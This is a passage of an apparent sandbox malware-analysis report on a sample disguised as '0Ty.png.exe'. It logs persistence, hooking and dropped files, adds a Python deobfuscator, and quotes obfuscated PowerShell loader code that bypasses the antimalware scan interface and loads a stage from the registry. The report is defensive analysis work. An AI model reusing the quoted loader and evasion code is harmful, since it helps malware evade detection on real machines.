            Source: C:\Windows\System32\dialer.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: napinsp.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: pnrpnsp.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: wshbth.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: nlaapi.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: winrnr.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\dialer.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\dllhost.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\System32\winlogon.exe | Section loaded: pdh.dll
            Source: C:\Windows\System32\lsass.exe | Section loaded: pdh.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
            Source: C:\Windows\System32\dwm.exe | Section loaded: pdh.dll
            Source: C:\Windows\System32\dllhost.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\System32\dllhost.exe | Section loaded: pdh.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
            Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
            Source: C:\Windows\System32\dialer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: 0Ty.png.exe | Static PE information: Image base 0x140000000 > 0x60000000
            Source: 0Ty.png.exe | Static file information: File size 5457920 > 1048576
            Source: 0Ty.png.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x526e00
            Source: 0Ty.png.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer($GwiYeAsQvQLFBf,$JUWLrRiAryQvoCLvYRG).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$GgrwIxrHHM
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+''+'A'+'R'+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer($gtTuUeciWixJxL,$PODdpwJbLVAeqmqHxFL).Invoke(''+[Char](97)+''+[Char](109)+'si'+'.'+''+[Char](100)+'ll');$DyCMYouZARyvvTbwm=$BXLsZikXLBwiCU.Invoke($Null,@([Object]$DBzwtCM
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+[Char](101)+'l'+[Char](101)+''+'g'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+''+'i'+''+'a'+''+'l
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CKtjhrwjgtVV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OBERloAcZJvOcu,[Parameter(Position=1)][Type]$NRdDEuXiTK)$iAHAMhduySN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+'mor'+[Char](121)+''+[Char](77)+''+'o'+'dul'+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+''+'y'+'p'+'e'+'',''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c,'+[Char](83)+'e'+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'nsiC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+'Cla'+'s'+''+'s'+'',[MulticastDelegate]);$iAHAMhduySN.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OBERloAcZJvOcu).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ged');$iAHAMhduySN.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+'ub'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Cha
r](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+[Char](108)+'',$NRdDEuXiTK,$OBERloAcZJvOcu).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+','+''+[Char](77)+'anag'+'e'+''+'d'+'');Write-Output $iAHAMhduySN.CreateType();}$qragMIYqXnsdW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+'te'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'os'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+''+'i'+'n3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+'s'+[Char](97)+'f'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+'ho'+[Char](100)+''+'s'+'');$OvDFGAtJneNnnn=$qragMIYqXnsdW.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DwpcGqRaxEQb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kwrQxTwRDzvgHI,[Parameter(Position=1)][Type]$doUOZqbWki)$ZycFOOCRuuH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+'M'+'o'+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+'ga'+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+'lass',[MulticastDelegate]);$ZycFOOCRuuH.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+'e'+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+'i'+'d'+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kwrQxTwRDzvgHI).SetImplementationFlags(''+'R'+''+'u'+'nt'+'i'+'m'+[Char](101)+','+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$ZycFOOCRuuH.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](1
17)+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+'Sig'+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'ir'+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'',$doUOZqbWki,$kwrQxTwRDzvgHI).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $ZycFOOCRuuH.CreateType();}$PIBnzpATGOiSb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+[Char](109)+''+[Char](46)+'d'+'l'+'l')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+'o'+'s'+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+'.'+'Uns'+[Char](97)+''+[Char](102)+'e'+'N'+''+[Char](97)+'t'+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char]
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CKtjhrwjgtVV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OBERloAcZJvOcu,[Parameter(Position=1)][Type]$NRdDEuXiTK)$iAHAMhduySN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+'mor'+[Char](121)+''+[Char](77)+''+'o'+'dul'+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+''+'y'+'p'+'e'+'',''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c,'+[Char](83)+'e'+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'nsiC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+'Cla'+'s'+''+'s'+'',[MulticastDelegate]);$iAHAMhduySN.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OBERloAcZJvOcu).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ged');$iAHAMhduySN.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+'ub'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Cha
r](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+[Char](108)+'',$NRdDEuXiTK,$OBERloAcZJvOcu).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+','+''+[Char](77)+'anag'+'e'+''+'d'+'');Write-Output $iAHAMhduySN.CreateType();}$qragMIYqXnsdW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+'te'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'os'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+''+'i'+'n3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+'s'+[Char](97)+'f'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+'ho'+[Char](100)+''+'s'+'');$OvDFGAtJneNnnn=$qragMIYqXnsdW.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DwpcGqRaxEQb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kwrQxTwRDzvgHI,[Parameter(Position=1)][Type]$doUOZqbWki)$ZycFOOCRuuH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+'M'+'o'+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+'ga'+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+'lass',[MulticastDelegate]);$ZycFOOCRuuH.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+'e'+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+'i'+'d'+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kwrQxTwRDzvgHI).SetImplementationFlags(''+'R'+''+'u'+'nt'+'i'+'m'+[Char](101)+','+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$ZycFOOCRuuH.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](1
17)+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+'Sig'+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'ir'+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'',$doUOZqbWki,$kwrQxTwRDzvgHI).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $ZycFOOCRuuH.CreateType();}$PIBnzpATGOiSb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+[Char](109)+''+[Char](46)+'d'+'l'+'l')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+'o'+'s'+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+'.'+'Uns'+[Char](97)+''+[Char](102)+'e'+'N'+''+[Char](97)+'t'+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char]
            Source: C:\Windows\System32\dialer.exe | Code function: 65_2_0000000140832D30 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect | 65_2_0000000140832D30
            Source: 0Ty.png.exe | Static PE information: section name: .00cfg
            Source: weiuemyrzjra.exe.0.dr | Static PE information: section name: .00cfg
            Source: C:\Windows\System32\conhost.exe | Code function: 31_3_000002408995B0ED push rcx; retf 003Fh | 31_3_000002408995B0EE
            Source: C:\Windows\System32\dialer.exe | Code function: 64_2_0000000140001394 push qword ptr [0000000140009004h]; ret | 64_2_0000000140001403
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 66_2_00007FFD9B8AB05C push esp; retf | 66_2_00007FFD9B8AB05D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 66_2_00007FFD9B8A63D1 push ebx; retf 0009h | 66_2_00007FFD9B8A641A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 66_2_00007FFD9BB2231A push 8B485F77h; iretd | 66_2_00007FFD9BB22322
            Source: C:\Windows\System32\conhost.exe | Code function: 67_3_0000014ECB48B0ED push rcx; retf 003Fh | 67_3_0000014ECB48B0EE
            Source: C:\Windows\System32\winlogon.exe | Code function: 69_3_00000225DC62B0ED push rcx; retf 003Fh | 69_3_00000225DC62B0EE
            Source: C:\Windows\System32\lsass.exe | Code function: 70_3_00000202C0ACB0ED push rcx; retf 003Fh | 70_3_00000202C0ACB0EE
            Source: C:\Windows\System32\svchost.exe | Code function: 71_3_000002A6612EB0ED push rcx; retf 003Fh | 71_3_000002A6612EB0EE
            Source: C:\Windows\System32\dwm.exe | Code function: 72_3_000002BAAEDEB0ED push rcx; retf 003Fh | 72_3_000002BAAEDEB0EE
            Source: C:\Windows\System32\dllhost.exe | Code function: 73_3_00000248FFB5B0ED push rcx; retf 003Fh | 73_3_00000248FFB5B0EE
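            The Anti Malware Scan Interface and process-creation records above show how the sample's PowerShell stage hides every sensitive string: 'amsi.dll', 'SOFTWARE', 'ReflectedDelegate', 'Microsoft.Win32.UnsafeNativeMethods' and the rest are assembled at run time from [Char](N) casts and one-character literals joined with +, so no plaintext string survives a substring match on the command line. As an added example that is not part of the Joe Sandbox report, the Python below statically folds such concatenation chains back into literals. The two fragments embedded in it are copied from the AMSI records above (truncated by the sandbox as shown), and the regular expressions only cover the single-quoted-literal and [Char](N) forms seen there; double-quoted strings, -join and the -f format operator would need further rules.

```python
import re

# One operand of a PowerShell '+' chain as it appears in the sample's command lines:
# a single-quoted literal ('' is the empty string, a doubled '' inside a literal is an
# escaped quote) or a [Char](N) cast.  Other obfuscation forms are deliberately not handled.
_OPERAND = r"(?:'(?:[^']|'')*'|\[Char\]\(\d+\))"
_CHAIN = re.compile(rf"{_OPERAND}(?:\s*\+\s*{_OPERAND})*", re.IGNORECASE)
_TOKEN = re.compile(r"'((?:[^']|'')*)'|\[Char\]\((\d+)\)", re.IGNORECASE)


def decode_chain(chain: str) -> str:
    """Evaluate one ''+[Char](97)+'m'+... chain to the string PowerShell would build."""
    parts = []
    for m in _TOKEN.finditer(chain):
        if m.group(2) is not None:            # [Char](N) -> that code point
            parts.append(chr(int(m.group(2))))
        else:                                 # 'literal', with '' unescaped to '
            parts.append(m.group(1).replace("''", "'"))
    return "".join(parts)


def deobfuscate(script: str) -> str:
    """Replace every concatenation chain in a script with a single quoted literal."""
    def fold(m: re.Match) -> str:
        return "'" + decode_chain(m.group(0)).replace("'", "''") + "'"
    return _CHAIN.sub(fold, script)


def extract_strings(script: str, min_len: int = 4) -> list:
    """Decoded literals in order of appearance, at least min_len long (for IOC review)."""
    return [s for s in (decode_chain(m.group(0)) for m in _CHAIN.finditer(script))
            if len(s) >= min_len]


# Fragments copied from the report's AMSI records above (cut off where the sandbox cut them).
AMSI_FRAGMENT = (
    "GetDelegateForFunctionPointer($GwiYeAsQvQLFBf,$JUWLrRiAryQvoCLvYRG).Invoke(''+[Char](97)+''"
    "+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')"
)
REGISTRY_FRAGMENT = (
    "[Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''"
    "+'T'+''+[Char](87)+''+'A'+'R'+'E'+'')"
)

if __name__ == "__main__":
    print(deobfuscate(AMSI_FRAGMENT))      # ...Invoke('amsi.dll')
    print(deobfuscate(REGISTRY_FRAGMENT))  # ...OpenSubkey('SOFTWARE')
    print(extract_strings(AMSI_FRAGMENT + REGISTRY_FRAGMENT))
```

            Run over the full command lines, the folded output makes the staging visible at a glance: a delegate is invoked on 'amsi.dll', and the next stage is loaded from a value under HKLM\SOFTWARE, which matches the dialerstager key write recorded further down in this report.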

            Persistence and Installation Behavior

            Source: C:\Windows\System32\lsass.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
            Source: C:\Windows\System32\lsass.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | File created: C:\Windows\TEMP\ihddniqxcjeb.sys
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | File created: C:\Windows\Temp\ihddniqxcjeb.sys
            Source: C:\Users\user\Desktop\0Ty.png.exe | File created: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe
            Source: C:\Users\user\Desktop\0Ty.png.exe | File created: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe | File created: C:\Windows\Temp\ihddniqxcjeb.sys
            Source: C:\Users\user\Desktop\0Ty.png.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

            Hooking and other Techniques for Hiding and Protection

            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
